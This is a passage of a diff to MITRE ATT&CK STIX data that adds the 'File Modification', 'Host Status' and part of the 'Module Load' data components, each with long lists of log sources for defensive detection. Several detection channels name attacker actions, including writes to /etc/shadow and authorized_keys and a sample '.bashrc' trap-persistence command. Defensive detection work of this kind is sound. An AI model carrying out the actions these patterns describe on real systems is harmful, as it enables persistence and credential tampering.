+                            "name": "WinEventLog:Setup",
+                            "channel": "MSI/Product install, repair or update events"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=15"
+                        },
+                        {
+                            "name": "WinEventLog:Windows Defender",
+                            "channel": "Operational log"
+                        },
+                        {
+                            "name": "WinEventLog:Windows Defender",
+                            "channel": "Operational"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-23 18:33:47.956000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0061",
+                            "external_id": "DC0061"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Modification",
+                    "description": "Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples: \n\n- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\\Windows\\System32\\drivers\\etc\\hosts` on Windows.\n- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.\n- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.\n- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.\n- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write calls modifying ~/.bashrc, ~/.profile, or /etc/paths.d"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File modification in /etc/paths.d or user shell rc files"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/quarantine.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of ~/Library/LaunchAgents or /Library/LaunchDaemons plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "AUDIT_SYSCALL (open, write, rename, unlink)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_WRITE, targeting .zshrc, .zlogin, .zprofile"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/install.log"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=2"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call for modification of /etc/sudoers or writing to /var/db/sudo"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: File modifications under /etc/ssl/certs, /usr/local/share/ca-certificates, or /etc/pki/ca-trust/source/anchors"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: Enumeration of root certificates showing unexpected additions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, unlink, rename: Suspicious file access, deletion, or modification of sensitive paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Anomalous plist modifications or sensitive file overwrites by non-standard processes"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Modification or deletion of /etc/audit/audit.rules or /etc/audit/audit.conf"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write of .service unit files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write/unlink"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loginwindow or desktopservices modified settings or files"
+                        },
+                        {
+                            "name": "ESXiLogs:messages",
+                            "channel": "changes to /etc/motd or /etc/vmware/welcome"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write, rename"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "file change monitoring within /etc/cron.*, /tmp, or mounted volumes"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "manual edits to /etc/rc.local.d/local.sh or cron.d"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "/etc/passwd or /etc/group file write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "SecurityAgentPlugins modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write: File modifications to *.plist within LaunchAgents, LaunchDaemons, Application Support, or Preferences directories"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "boot"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of backgrounditems.btm or creation of LoginItems subdirectory in .app bundle"
+                        },
+                        {
+                            "name": "fs:filesystem",
+                            "channel": "Modification or creation of files matching 'com.apple.loginwindow.*.plist' in ~/Library/Preferences/ByHost"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write | PATH=/home/*/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "macos:auth",
+                            "channel": "~/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "compute.instances.setMetadata"
+                        },
+                        {
+                            "name": "azure:resource",
+                            "channel": "PATCH vm/authorized_keys"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "file write or edit"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "rename"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "file_write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of plist with apple.awt.UIElement set to TRUE"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "unlink, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: Write operations targeting /dev/sda, /dev/nvme0n1, or EFI partition mounts"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write: Modification of /boot/grub/*, /boot/efi/EFI/*, or initramfs images"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "config-change: timezone or ntp server configuration change after a time query command"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "replace existing dylibs"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes to boot variables, startup image paths, or checksum verification failures"
+                        },
+                        {
+                            "name": "firmware:update",
+                            "channel": "Unexpected or unscheduled firmware updates, image overwrites, or failed signature validation"
+                        },
+                        {
+                            "name": "IntegrityCheck:ImageValidation",
+                            "channel": "Checksum or hash mismatch between running image and known-good vendor-provided image"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "File modifications in ~/Library/Preferences/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write to /etc/pam.d/*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /Library/Security/SecurityAgentPlugins"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modifications to Mail.app plist files controlling message rules"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write: Modification of structured stored data by suspicious processes"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unexpected log entries or malformed SQL operations in databases"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected creation or modification of stored data files in protected directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat, write, rename, unlink"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file encrypted|new file with .encrypted extension|disk write burst"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "rename .vmdk to .*.locked|datastore write spike"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mach-O binary modified or LC_LOAD_DYLIB segment inserted"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write syscalls targeting /etc/ld.so.preload or binaries in /usr/bin"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modified application plist or binary replacement in /Applications"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "admin command usage"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "startup-config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation or overwrite in common web-hosting folders"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Unauthorized file modifications within datastore volumes via shell access or vCLI"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing 'crypto', 'key length', 'cipher', or downgrade of encryption settings"
+                        },
+                        {
+                            "name": "FirmwareLogs:Update",
+                            "channel": "Unexpected firmware or image updates modifying cryptographic modules"
+                        },
+                        {
+                            "name": "fs:plist",
+                            "channel": "/var/root/Library/Preferences/com.apple.loginwindow.plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "modification of existing .service file"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write or create events on *.pth, sitecustomize.py, usercustomize.py in site-packages or dist-packages"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write of plist files in /Library/LaunchAgents or /Library/LaunchDaemons"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Unexpected modification to lsass.exe or cryptdll.dll"
+                        },
+                        {
+                            "name": "networkconfig",
+                            "channel": "unexpected OS image file upload or modification events"
+                        },
+                        {
+                            "name": "network:runtime",
+                            "channel": "checksum or runtime memory verification failures"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: Modification of /boot/grub/* or /boot/efi/*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /System/Library/CoreServices/boot.efi"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of LaunchAgents or LaunchDaemons plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "rename,chmod"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "create/write/rename under user-writable paths"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Changes to LSFileQuarantineEnabled field in Info.plist"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file access to /usr/lib/cron/tabs/ and cron output files"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "modification of crontab or local.sh entries"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration file modified or replaced on network device"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Plist modifications containing virtualization run configurations"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file access to /usr/lib/cron/at and job execution path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "binary modified or replaced"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "binary or module replacement event"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration change events referencing encryption, TLS/SSL, or IPSec settings"
+                        },
+                        {
+                            "name": "networkdevice:firmware",
+                            "channel": "Unexpected firmware update or image modification affecting crypto modules"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating permission, ownership, or extended attribute changes on critical paths. File system modification events with kFSEventStreamEventFlagItemChangeOwner, kFSEventStreamEventFlagItemXattrMod flags"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Modification of Display Manager configuration files (/etc/gdm3/*, /etc/lightdm/*)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /Library/Preferences/com.apple.loginwindow plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Modification of user shell profile or trap registration via echo/redirection (e.g., echo \"trap 'malicious_cmd' INT\" >> ~/.bashrc)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File write or append to .zshrc, .bash_profile, .zprofile, etc."
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, write, create, open"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Extensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: File writes to application binaries or libraries at runtime"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CALCULATE: Mismatch in file integrity of critical macOS applications"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file write operations in /Library/WebServer/Documents"
+                        },
+                        {
+                            "name": "fs:launchdaemons",
+                            "channel": "file_modify"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write: File modifications to /etc/systemd/sleep.conf or related power configuration files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write: File modification to com.apple.PowerManagement.plist or related system preference files"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "modification of existing LaunchAgents plist"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create/modify dylib in monitored directories"
+                        },
+                        {
+                            "name": "WinEventLog:CodeIntegrity",
+                            "channel": "EventCode=3033"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write operation on /etc/passwd or /etc/shadow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "modification to /var/db/dslocal/nodes/Default/users/"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "New or modified kernel object files (.ko) within /lib/modules directory"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Modifications to /var/db/SystemPolicyConfiguration/KextPolicy or kext_policy table"
+                        },
+                        {
+                            "name": "networkdevice:audit",
+                            "channel": "SNMP configuration changes, such as enabling read/write access or modifying community strings"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mount or losetup commands creating hidden or encrypted FS"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Hidden volume attachment or modification events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious plist edits for volume mounting behavior"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes to startup image paths, boot loader parameters, or debug flags"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Checksum/hash mismatch between device OS image and baseline known-good version"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file writes"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "OfficeTelemetry or DLP"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Filesystem Access Logging"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing cryptographic hardware modules or disabling hardware acceleration"
+                        },
+                        {
+                            "name": "FirmwareLogs:Update",
+                            "channel": "Unexpected firmware updates that alter encryption libraries or disable hardware crypto modules"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Anomalous editing of invoice or payment document templates"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "truncate, unlink, write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification or replacement of /Library/Application Support/com.apple.TCC/TCC.db or ~/Library/Application Support/com.apple.TCC/TCC.db"
+                        },
+                        {
+                            "name": "linux:fim",
+                            "channel": "Changes to /etc/rc.local.d/local.sh or creation of unexpected startup files in persistent partitions (/etc/init.d, /store, /locker)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "write, rename"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write to /proc/*/mem or /proc/*/maps"
+                        },
+                        {
+                            "name": "sysdig:file",
+                            "channel": "evt.type=write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "rule definitions written to emond rule plists"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing older image versions or unexpected boot parameters"
+                        },
+                        {
+                            "name": "FileIntegrity:ImageValidation",
+                            "channel": "Hash/checksum mismatch against baseline vendor-provided OS image versions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write or rename to /etc/systemd/system or /etc/init.d"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file write to launchd plist paths"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "modification of entrypoint scripts or init containers"
+                        },
+                        {
+                            "name": "fs:plist_monitoring",
+                            "channel": "/Users/*/Library/Mail/V*/MailData/RulesActiveState.plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod/chown to /etc/passwd or /etc/shadow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write syscalls targeting web directory files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Terminal/Editor processes modifying web folder"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "AndroidLogs:FileSystem",
+                            "channel": "Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "odification of ~/.ssh/authorized_keys or credential files"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-16 16:41:53.549000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0018",
+                            "external_id": "DC0018"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Host Status",
+                    "description": "Logging, messaging, and other artifacts that highlight the health and operational state of host-based security sensors, such as Endpoint Detection and Response (EDR) agents, antivirus software, logging services, and system monitoring tools. Monitoring sensor health is essential for detecting misconfigurations, sensor failures, tampering, or deliberate security control evasion by adversaries.\n\n*Data Collection Measures:*\n\n- Windows Event Logs:\n    - Event ID 1074 (System Shutdown): Detects unexpected system reboots/shutdowns.\n    - Event ID 6006 (Event Log Stopped): Logs when Windows event logging is stopped.\n    - Event ID 16 (Sysmon): Detects configuration state changes that may indicate log tampering.\n    - Event ID 12 (Windows Defender Status Change) \u2013 Detects changes in Windows Defender state.\n- Linux/macOS Monitoring:\n    - `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log`\n    - Journald (journalctl) for kernel and system alerts.\n- Endpoint Detection and Response (EDR) Tools:\n    - Monitor agent health status, detect sensor tampering, and alert on missing telemetry.\n- Mobile Threat Intelligence Logs:\n    - Samsung Knox, SafetyNet, iOS Secure Enclave provide sensor health status for mobile endpoints.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "no logging host, no aaa new-model, no snmp-server, commit"
+                        },
+                        {
+                            "name": "android:appops",
+                            "channel": "ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries"
+                        },
+                        {
+                            "name": "AndroidAttestation:SafetyNet",
+                            "channel": "SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false"
+                        },
+                        {
+                            "name": "AndroidAttestation:VerifiedBoot",
+                            "channel": "Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure"
+                        },
+                        {
+                            "name": "AndroidLogs:Crash",
+                            "channel": "Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID"
+                        },
+                        {
+                            "name": "AndroidLogs:Crash",
+                            "channel": "Application or system process crash/restart patterns temporally associated with remote service communications"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "firmware_update, kexec_load"
+                        },
+                        {
+                            "name": "AWS:CloudMetrics",
+                            "channel": "Autoscaling, memory/cpu alarms, or instance unhealthiness"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Sustained spike in CPU usage on EC2 instance with web service role"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "StatusCheckFailed or StatusCheckFailed_System for burstable instances (t2/t3)"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Sustained EC2 CPU usage above normal baseline"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "NetworkOut spike beyond baseline"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Sudden spike in network output without a corresponding inbound request ratio"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Unusual CPU burst or metric anomalies"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Powering off or restarting host"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "code signature validation failure / exec of invalidly-signed payload from sandboxed app"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application crash logs, watchdog terminations, or abnormal execution events associated with service communication"
+                        },
+                        {
+                            "name": "journald:boot",
+                            "channel": "Secure Boot failure, firmware version change"
+                        },
+                        {
+                            "name": "kubernetes:events",
+                            "channel": "CrashLoopBackOff, OOMKilled, container restart count exceeds threshold"
+                        },
+                        {
+                            "name": "linux:procfs",
+                            "channel": "Sustained high /proc/[pid]/stat usage"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Out of memory killer invoked or kernel panic entries"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Service stop or disable messages for security tools not reflected in SIEM alerts"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "system is powering down"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "interface_details "
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "Hardware UUID or device list drift"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Web service process (e.g., httpd) entering crash loop or consuming excessive CPU"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Spike in CPU or memory use from non-user-initiated processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Termination or disabling of XProtect, Gatekeeper, or third-party AV daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network stack resource exhaustion, tcp_accept queue overflow, repeated resets"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "EFI firmware integrity check failed"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "System Integrity Protection (SIP) state reported as disabled"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "System shutdown or reboot requested"
+                        },
+                        {
+                            "name": "MDM:DeviceIntegrity",
+                            "channel": "jailbreak/root compromise indicators or integrity attestation failures enabling process visibility"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "System reboot scheduled or performed"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP: possible SYN flood or backlog limit exceeded"
+                        },
+                        {
+                            "name": "OEMAttestation:Knox",
+                            "channel": "Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set"
+                        },
+                        {
+                            "name": "prometheus:metrics",
+                            "channel": "Container CPU/Memory usage exceeding threshold"
+                        },
+                        {
+                            "name": "sar:network",
+                            "channel": "Outbound network saturation with minimal process activity"
+                        },
+                        {
+                            "name": "Sensor Health",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Windows:perfmon",
+                            "channel": "Sustained CPU/memory exhaustion by service process (e.g., w3wp.exe)"
+                        },
+                        {
+                            "name": "Windows:perfmon",
+                            "channel": "High sustained CPU usage by a single process"
+                        },
+                        {
+                            "name": "Windows:perfmon",
+                            "channel": "Sudden spike in outbound throughput without corresponding inbound traffic"
+                        },
+                        {
+                            "name": "Windows:perfmon",
+                            "channel": "Sudden spikes in CPU/Memory usage linked to specific application processes"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-TCPIP",
+                            "channel": "Connection queue overflow or failure to allocate TCP state object"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=1166, 7045"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=1074"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=6006"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=16"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "System shutdowns due to bugcheck (Event ID 1001) or watchdog timer expirations"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-20 18:17:23.974000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0016",
+                            "external_id": "DC0016"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Module Load",
+                    "description": "When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Module",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=7"
+                        },
+                        {
+                            "name": "ETW:LoadImage",
+                            "channel": "provider: ETW LoadImage events for images from user-writable/UNC paths"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat/read/mmap: Open/mmap .so files from non-standard paths"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "select: Open files path LIKE '/tmp/%.so' OR '/dev/shm/%.so'"
+                        },
+                        {
